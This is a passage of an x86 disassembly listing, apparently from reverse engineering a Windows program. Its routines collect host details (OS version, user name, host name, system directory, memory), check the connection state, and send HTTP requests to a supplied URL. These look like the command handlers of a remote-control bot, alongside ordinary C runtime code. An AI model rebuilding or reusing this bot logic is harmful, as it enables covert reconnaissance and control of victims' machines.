sub_41A98D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA43 proc near ; CODE XREF: sub_401ACD+276F�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset byte_43D808
mov [ebp+var_CC], 94h
call dword_4270C8 ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_41AACA
cmp [ebp+var_C4], ebx
jnz short loc_41AAA6
cmp [ebp+var_BC], 1
jnz short loc_41AA90
mov [ebp+var_4], offset dword_431974
loc_41AA90: ; CODE XREF: sub_41AA43+44�j
cmp [ebp+var_BC], 2
jnz loc_41AB45
mov [ebp+var_4], offset dword_431970
jmp short loc_41AB16
; ---------------------------------------------------------------------------
loc_41AAA6: ; CODE XREF: sub_41AA43+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_41AAB8
mov [ebp+var_4], offset dword_43196C
jmp short loc_41AB0D
; ---------------------------------------------------------------------------
loc_41AAB8: ; CODE XREF: sub_41AA43+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_41AB06
mov [ebp+var_4], offset dword_431968
jmp short loc_41AB0D
; ---------------------------------------------------------------------------
loc_41AACA: ; CODE XREF: sub_41AA43+33�j
cmp [ebp+var_C8], 5
jnz short loc_41AB06
cmp [ebp+var_C4], ebx
jnz short loc_41AAE4
mov [ebp+var_4], offset dword_431964
jmp short loc_41AB0D
; ---------------------------------------------------------------------------
loc_41AAE4: ; CODE XREF: sub_41AA43+96�j
cmp [ebp+var_C4], 1
jnz short loc_41AAF6
mov [ebp+var_4], offset dword_431960
jmp short loc_41AB0D
; ---------------------------------------------------------------------------
loc_41AAF6: ; CODE XREF: sub_41AA43+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_41AB0D
loc_41AB06: ; CODE XREF: sub_41AA43+7C�j
; sub_41AA43+8E�j
mov [ebp+var_4], offset dword_431958
loc_41AB0D: ; CODE XREF: sub_41AA43+73�j
; sub_41AA43+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_41AB45
loc_41AB16: ; CODE XREF: sub_41AA43+61�j
cmp [ebp+var_B8], bl
jz short loc_41AB45
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset aSS_2 ; "%s (%s)"
push eax
call sub_41B886
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_41AB45: ; CODE XREF: sub_41AA43+54�j
; sub_41AA43+D1�j ...
mov ax, word_437F2C
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, ds:dword_4CB534
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_41AB7E
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_41AB7E: ; CODE XREF: sub_41AA43+12C�j
push [ebp+arg_4]
call sub_40AC10
pop ecx
push eax
call ds:dword_4CB694 ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_4CB60C ; gethostbyaddr
cmp eax, ebx
jz short loc_41ABA7
push dword ptr [eax]
jmp short loc_41ABAC
; ---------------------------------------------------------------------------
loc_41ABA7: ; CODE XREF: sub_41AA43+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_41ABAC: ; CODE XREF: sub_41AA43+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_41B886
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h
push eax
call dword_427074 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset dword_43A7FC
push ebx
mov esi, 409h
push ebx
push esi
call dword_427104 ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call dword_427100 ; GetTimeFormatA
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
call dword_427194 ; GlobalMemoryStatus
push ebx
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_41B9D1
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_416A33
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_41A88C
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40AC10
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_416923
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_416923
pop ecx
pop ecx
push eax
call sub_41A98D
push edx
push eax
push offset dword_43A720
push 200h
push [ebp+arg_0]
call sub_41B980
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_41AA43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ACF7 proc near ; CODE XREF: sub_401ACD+279D�p
; sub_401ACD+72F6�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_41B590
add esp, 0Ch
cmp ds:dword_4CB73C, 0
jnz short loc_41AD63
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call ds:dword_4CB518 ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_41AD4C
lea eax, [ebp+var_8C]
push offset dword_43A87C
push eax
call sub_41B886
pop ecx
pop ecx
loc_41AD4C: ; CODE XREF: sub_41ACF7+40�j
test [ebp+var_C], 1
jz short loc_41AD59
push offset dword_43A874
jmp short loc_41AD5E
; ---------------------------------------------------------------------------
loc_41AD59: ; CODE XREF: sub_41ACF7+59�j
push offset dword_43A870
loc_41AD5E: ; CODE XREF: sub_41ACF7+60�j
lea eax, [ebp+var_8]
jmp short loc_41AD7B
; ---------------------------------------------------------------------------
loc_41AD63: ; CODE XREF: sub_41ACF7+28�j
mov esi, offset off_43A86C
lea eax, [ebp+var_8]
push esi
push eax
call sub_41B886
pop ecx
lea eax, [ebp+var_8C]
pop ecx
push esi
loc_41AD7B: ; CODE XREF: sub_41ACF7+6A�j
push eax
call sub_41B886
pop ecx
pop ecx
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40AC10
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_43A828
push 200h
push [ebp+arg_0]
call sub_41B980
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_41ACF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ADB6 proc near ; DATA XREF: sub_401ACD+7715�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp+var_148]
push ebx
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset dword_43A95C
call sub_41B590
push edi
lea eax, [ebp+var_1C8]
push ebx
push eax
call sub_41B590
push edi
lea eax, [ebp+var_C8]
push ebx
push eax
call sub_41B590
push 100h
lea eax, [ebp+var_65C]
push ebx
push eax
call sub_41B590
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_41B590
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_358]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_358]
push eax
call ds:dword_4CB550 ; InternetCrackUrlA
test eax, eax
jz loc_41AF50
cmp [ebp+var_34], ebx
jbe short loc_41AE8D
push [ebp+var_34]
lea eax, [ebp+var_148]
push [ebp+var_38]
push eax
call sub_41B5F0
add esp, 0Ch
loc_41AE8D: ; CODE XREF: sub_41ADB6+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_41AEAB
push [ebp+var_28]
lea eax, [ebp+var_1C8]
push [ebp+var_2C]
push eax
call sub_41B5F0
add esp, 0Ch
loc_41AEAB: ; CODE XREF: sub_41ADB6+DE�j
cmp [ebp+var_20], ebx
jbe short loc_41AEC5
push [ebp+var_20]
lea eax, [ebp+var_C8]
push [ebp+var_24]
push eax
call sub_41B5F0
add esp, 0Ch
loc_41AEC5: ; CODE XREF: sub_41ADB6+F8�j
cmp [ebp+var_18], ebx
jbe short loc_41AEDF
push [ebp+var_18]
lea eax, [ebp+var_65C]
push [ebp+var_1C]
push eax
call sub_41B5F0
add esp, 0Ch
loc_41AEDF: ; CODE XREF: sub_41ADB6+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+var_1C8]
push eax
lea eax, [ebp+var_148]
push esi
push eax
push ds:dword_4CB604
call ds:dword_4CB628 ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_41AF68
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call ds:dword_4CB61C ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_41AF6F
push ebx
push ebx
push ebx
push ebx
push eax
call ds:dword_4CB5C8 ; HttpSendRequestA
test eax, eax
jz short loc_41AF49
push offset dword_43A940
jmp short loc_41AF74
; ---------------------------------------------------------------------------
loc_41AF49: ; CODE XREF: sub_41ADB6+18A�j
push offset unk_43A904
jmp short loc_41AF74
; ---------------------------------------------------------------------------
loc_41AF50: ; CODE XREF: sub_41ADB6+B7�j
lea eax, [ebp+var_55C]
push offset dword_43A8E8
push eax
call sub_41B886
mov esi, [ebp+var_C]
pop ecx
pop ecx
jmp short loc_41AF82
; ---------------------------------------------------------------------------
loc_41AF68: ; CODE XREF: sub_41ADB6+153�j
push offset unk_43A8BC
jmp short loc_41AF74
; ---------------------------------------------------------------------------
loc_41AF6F: ; CODE XREF: sub_41ADB6+17B�j
push offset unk_43A88C
loc_41AF74: ; CODE XREF: sub_41ADB6+191�j
; sub_41ADB6+198�j ...
lea eax, [ebp+var_55C]
push eax
call sub_41B886
pop ecx
pop ecx
loc_41AF82: ; CODE XREF: sub_41ADB6+1B0�j
cmp [ebp+var_1D4], ebx
jnz short loc_41AFAD
push ebx
lea eax, [ebp+var_55C]
push [ebp+var_1D0]
push eax
lea eax, [ebp+var_258]
push eax
push [ebp+var_35C]
call sub_409A73
add esp, 14h
loc_41AFAD: ; CODE XREF: sub_41ADB6+1D2�j
lea eax, [ebp+var_55C]
push eax
call sub_4151AD
pop ecx
push esi
call ds:dword_4CB688 ; InternetCloseHandle
push [ebp+var_4]
call ds:dword_4CB688 ; InternetCloseHandle
push [ebp+var_1D8]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
pop edi
pop esi
pop ebx
sub_41ADB6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AFE0 proc near ; CODE XREF: sub_401000+34�p
; sub_401221+14D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_41B000
loc_41AFEC: ; CODE XREF: sub_41AFE0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_41B033
test ecx, 3
jnz short loc_41AFEC
add eax, 0
loc_41B000: ; CODE XREF: sub_41AFE0+A�j
; sub_41AFE0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41B000
mov eax, [ecx-4]
test al, al
jz short loc_41B051
test ah, ah
jz short loc_41B047
test eax, 0FF0000h
jz short loc_41B03D
test eax, 0FF000000h
jz short loc_41B033
jmp short loc_41B000
; ---------------------------------------------------------------------------
loc_41B033: ; CODE XREF: sub_41AFE0+11�j
; sub_41AFE0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41B03D: ; CODE XREF: sub_41AFE0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41B047: ; CODE XREF: sub_41AFE0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41B051: ; CODE XREF: sub_41AFE0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_41AFE0 endp
; =============== S U B R O U T I N E =======================================
sub_41B05B proc near ; CODE XREF: sub_4010AB+64�p
; sub_401ACD+58DB�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_41B070
or eax, 0FFFFFFFFh
jmp short loc_41B0AA
; ---------------------------------------------------------------------------
loc_41B070: ; CODE XREF: sub_41B05B+E�j
test al, 83h
jz short loc_41B0A8
push esi
call sub_41DB8B
push esi
mov edi, eax
call sub_41DB25
push dword ptr [esi+10h]
call sub_41DA72
add esp, 0Ch
test eax, eax
jge short loc_41B096
or edi, 0FFFFFFFFh
jmp short loc_41B0A8
; ---------------------------------------------------------------------------
loc_41B096: ; CODE XREF: sub_41B05B+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_41B0A8
push eax
call sub_41B0B1
and dword ptr [esi+1Ch], 0
pop ecx
loc_41B0A8: ; CODE XREF: sub_41B05B+17�j
; sub_41B05B+39�j ...
mov eax, edi
loc_41B0AA: ; CODE XREF: sub_41B05B+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_41B05B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0B1 proc near ; CODE XREF: sub_4010AB+5E�p
; sub_40AB32+B1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_41B117
mov eax, ds:dword_4DCFE8
cmp eax, 3
jnz short loc_41B0DD
push esi
call sub_41DE77
pop ecx
test eax, eax
push esi
jz short loc_41B109
push eax
call sub_41DEA2
pop ecx
pop ecx
jmp short loc_41B117
; ---------------------------------------------------------------------------
loc_41B0DD: ; CODE XREF: sub_41B0B1+14�j
cmp eax, 2
jnz short loc_41B108
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_4]
push eax
push esi
call sub_41EBD2
add esp, 0Ch
test eax, eax
jz short loc_41B108
push eax
push [ebp+arg_0]
push [ebp+var_4]
call sub_41EC29
add esp, 0Ch
jmp short loc_41B117
; ---------------------------------------------------------------------------
loc_41B108: ; CODE XREF: sub_41B0B1+2F�j
; sub_41B0B1+44�j
push esi
loc_41B109: ; CODE XREF: sub_41B0B1+20�j
push 0
push ds:dword_4DCFE4
call dword_427140 ; RtlFreeHeap
loc_41B117: ; CODE XREF: sub_41B0B1+A�j
; sub_41B0B1+2A�j ...
pop esi
leave
retn
sub_41B0B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B11A proc near ; CODE XREF: sub_4010AB+45�p
; sub_40F03C+4E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_41B13E
xor eax, eax
jmp loc_41B1E7
; ---------------------------------------------------------------------------
loc_41B13E: ; CODE XREF: sub_41B11A+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_41B151
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_41B15D
; ---------------------------------------------------------------------------
loc_41B151: ; CODE XREF: sub_41B11A+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_41B15D
; ---------------------------------------------------------------------------
loc_41B15A: ; CODE XREF: sub_41B11A+C4�j
mov ecx, [ebp+arg_0]
loc_41B15D: ; CODE XREF: sub_41B11A+35�j
; sub_41B11A+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_41B18F
mov eax, [esi+4]
test eax, eax
jz short loc_41B18F
cmp ecx, eax
mov edi, ecx
jb short loc_41B174
mov edi, eax
loc_41B174: ; CODE XREF: sub_41B11A+56�j
push edi
push dword ptr [esi]
push ebx
call sub_41C310
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_41B1DA
; ---------------------------------------------------------------------------
loc_41B18F: ; CODE XREF: sub_41B11A+49�j
; sub_41B11A+50�j
cmp ecx, [ebp+arg_C]
jb short loc_41B1C2
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_41B1A5
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_41B1A5: ; CODE XREF: sub_41B11A+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41F11C
add esp, 0Ch
test eax, eax
jz short loc_41B1EC
cmp eax, 0FFFFFFFFh
jz short loc_41B1F2
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_41B1DA
; ---------------------------------------------------------------------------
loc_41B1C2: ; CODE XREF: sub_41B11A+78�j
push esi
call sub_41F043
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41B1F6
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_41B1DA: ; CODE XREF: sub_41B11A+73�j
; sub_41B11A+A6�j
cmp [ebp+arg_0], 0
jnz loc_41B15A
mov eax, [ebp+arg_8]
loc_41B1E7: ; CODE XREF: sub_41B11A+1F�j
; sub_41B11A+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41B1EC: ; CODE XREF: sub_41B11A+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_41B1F6
; ---------------------------------------------------------------------------
loc_41B1F2: ; CODE XREF: sub_41B11A+9F�j
or dword ptr [esi+0Ch], 20h
loc_41B1F6: ; CODE XREF: sub_41B11A+B2�j
; sub_41B11A+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_41B1E7
sub_41B11A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B202 proc near ; CODE XREF: sub_4010AB+2E�p
; sub_41CFD3+35�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jnz short loc_41B21D
push [ebp+arg_4]
call sub_41B4D5
pop ecx
jmp loc_41B49D
; ---------------------------------------------------------------------------
loc_41B21D: ; CODE XREF: sub_41B202+B�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_41B232
push [ebp+arg_0]
call sub_41B0B1
pop ecx
jmp loc_41B49B
; ---------------------------------------------------------------------------
loc_41B232: ; CODE XREF: sub_41B202+20�j
mov eax, ds:dword_4DCFE8
cmp eax, 3
jnz loc_41B342
loc_41B240: ; CODE XREF: sub_41B202+12E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41B31E
push [ebp+arg_0]
call sub_41DE77
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_41B2F9
cmp esi, ds:dword_4DCFE0
ja short loc_41B2B2
mov edi, [ebp+arg_0]
push esi
push edi
push ebx
call sub_41E680
add esp, 0Ch
test eax, eax
jnz short loc_41B2AE
push esi
call sub_41E1CB
mov edi, eax
pop ecx
test edi, edi
jz short loc_41B2B2
mov ebx, [ebp+arg_0]
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_41B292
mov eax, esi
loc_41B292: ; CODE XREF: sub_41B202+8C�j
push eax
push ebx
push edi
call sub_41C310
push ebx
call sub_41DE77
push [ebp+arg_0]
mov ebx, eax
push ebx
call sub_41DEA2
add esp, 18h
loc_41B2AE: ; CODE XREF: sub_41B202+74�j
test edi, edi
jnz short loc_41B2F5
loc_41B2B2: ; CODE XREF: sub_41B202+62�j
; sub_41B202+81�j
test esi, esi
jnz short loc_41B2B9
push 1
pop esi
loc_41B2B9: ; CODE XREF: sub_41B202+B2�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push ds:dword_4DCFE4
call dword_427144 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_41B2F5
mov ecx, [ebp+arg_0]
mov eax, [ecx-4]
dec eax
cmp eax, esi
jb short loc_41B2E1
mov eax, esi
loc_41B2E1: ; CODE XREF: sub_41B202+DB�j
push eax
push ecx
push edi
call sub_41C310
push [ebp+arg_0]
push ebx
call sub_41DEA2
add esp, 14h
loc_41B2F5: ; CODE XREF: sub_41B202+AE�j
; sub_41B202+D0�j
test ebx, ebx
jnz short loc_41B31A
loc_41B2F9: ; CODE XREF: sub_41B202+56�j
test esi, esi
jnz short loc_41B300
push 1
pop esi
loc_41B300: ; CODE XREF: sub_41B202+F9�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push ds:dword_4DCFE4
call dword_427198 ; RtlReAllocateHeap
mov edi, eax
loc_41B31A: ; CODE XREF: sub_41B202+F5�j
test edi, edi
jnz short loc_41B33B
loc_41B31E: ; CODE XREF: sub_41B202+43�j
cmp ds:dword_4DB9DC, 0
jz short loc_41B33B
push esi
call sub_41F312
test eax, eax
pop ecx
jnz loc_41B240
jmp loc_41B49B
; ---------------------------------------------------------------------------
loc_41B33B: ; CODE XREF: sub_41B202+11A�j
; sub_41B202+123�j ...
mov eax, edi
jmp loc_41B49D
; ---------------------------------------------------------------------------
loc_41B342: ; CODE XREF: sub_41B202+38�j
cmp eax, 2
jnz loc_41B45D
cmp esi, 0FFFFFFE0h
ja short loc_41B35F
test esi, esi
jbe short loc_41B35C
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_41B35F
; ---------------------------------------------------------------------------
loc_41B35C: ; CODE XREF: sub_41B202+150�j
push 10h
pop esi
loc_41B35F: ; CODE XREF: sub_41B202+14C�j
; sub_41B202+158�j ...
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41B43F
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_41EBD2
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jz loc_41B423
cmp esi, dword_43C9D4
jnb short loc_41B3E7
mov edi, esi
shr edi, 4
push edi
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41EF9A
add esp, 10h
test eax, eax
jz short loc_41B3AD
mov edi, [ebp+arg_0]
jmp short loc_41B3DF
; ---------------------------------------------------------------------------
loc_41B3AD: ; CODE XREF: sub_41B202+1A4�j
push edi
call sub_41EC6E
mov edi, eax
pop ecx
test edi, edi
jz short loc_41B3E7
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_41B3C6
mov eax, esi
loc_41B3C6: ; CODE XREF: sub_41B202+1C0�j
push eax
push [ebp+arg_0]
push edi
call sub_41C310
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41EC29
add esp, 18h
loc_41B3DF: ; CODE XREF: sub_41B202+1A9�j
test edi, edi
jnz loc_41B33B
loc_41B3E7: ; CODE XREF: sub_41B202+18B�j
; sub_41B202+1B6�j
push esi
push 0
push ds:dword_4DCFE4
call dword_427144 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_41B43F
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_41B408
mov eax, esi
loc_41B408: ; CODE XREF: sub_41B202+202�j
push eax
push [ebp+arg_0]
push edi
call sub_41C310
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41EC29
add esp, 18h
jmp short loc_41B437
; ---------------------------------------------------------------------------
loc_41B423: ; CODE XREF: sub_41B202+17F�j
push esi
push [ebp+arg_0]
push 0
push ds:dword_4DCFE4
call dword_427198 ; RtlReAllocateHeap
mov edi, eax
loc_41B437: ; CODE XREF: sub_41B202+21F�j
test edi, edi
jnz loc_41B33B
loc_41B43F: ; CODE XREF: sub_41B202+162�j
; sub_41B202+1F8�j
cmp ds:dword_4DB9DC, 0
jz loc_41B33B
push esi
call sub_41F312
test eax, eax
pop ecx
jnz loc_41B35F
jmp short loc_41B49B
; ---------------------------------------------------------------------------
loc_41B45D: ; CODE XREF: sub_41B202+143�j
; sub_41B202+297�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_41B487
test esi, esi
jnz short loc_41B46B
push 1
pop esi
loc_41B46B: ; CODE XREF: sub_41B202+264�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push ds:dword_4DCFE4
call dword_427198 ; RtlReAllocateHeap
test eax, eax
jnz short loc_41B49D
loc_41B487: ; CODE XREF: sub_41B202+260�j
cmp ds:dword_4DB9DC, 0
jz short loc_41B49D
push esi
call sub_41F312
test eax, eax
pop ecx
jnz short loc_41B45D
loc_41B49B: ; CODE XREF: sub_41B202+2B�j
; sub_41B202+134�j ...
xor eax, eax
loc_41B49D: ; CODE XREF: sub_41B202+16�j
; sub_41B202+13B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41B202 endp
; =============== S U B R O U T I N E =======================================
sub_41B4A2 proc near ; CODE XREF: sub_41B4C2+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41F49D
test eax, eax
jnz short loc_41B4AC
retn
; ---------------------------------------------------------------------------
loc_41B4AC: ; CODE XREF: sub_41B4A2+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41F32D
add esp, 10h
retn
sub_41B4A2 endp
; =============== S U B R O U T I N E =======================================
sub_41B4C2 proc near ; CODE XREF: sub_4010AB+18�p
; sub_401ACD+58AF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41B4A2
add esp, 0Ch
retn
sub_41B4C2 endp
; =============== S U B R O U T I N E =======================================
sub_41B4D5 proc near ; CODE XREF: sub_4010AB+6�p
; sub_40AB32+63�p ...
arg_0 = dword ptr 4
push ds:dword_4DB9DC
push [esp+4+arg_0]
call sub_41B4E7
pop ecx
pop ecx
retn
sub_41B4D5 endp
; =============== S U B R O U T I N E =======================================
sub_41B4E7 proc near ; CODE XREF: sub_41B4D5+A�p
; sub_41CFC5+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_41B510
loc_41B4EE: ; CODE XREF: sub_41B4E7+27�j
push [esp+arg_0]
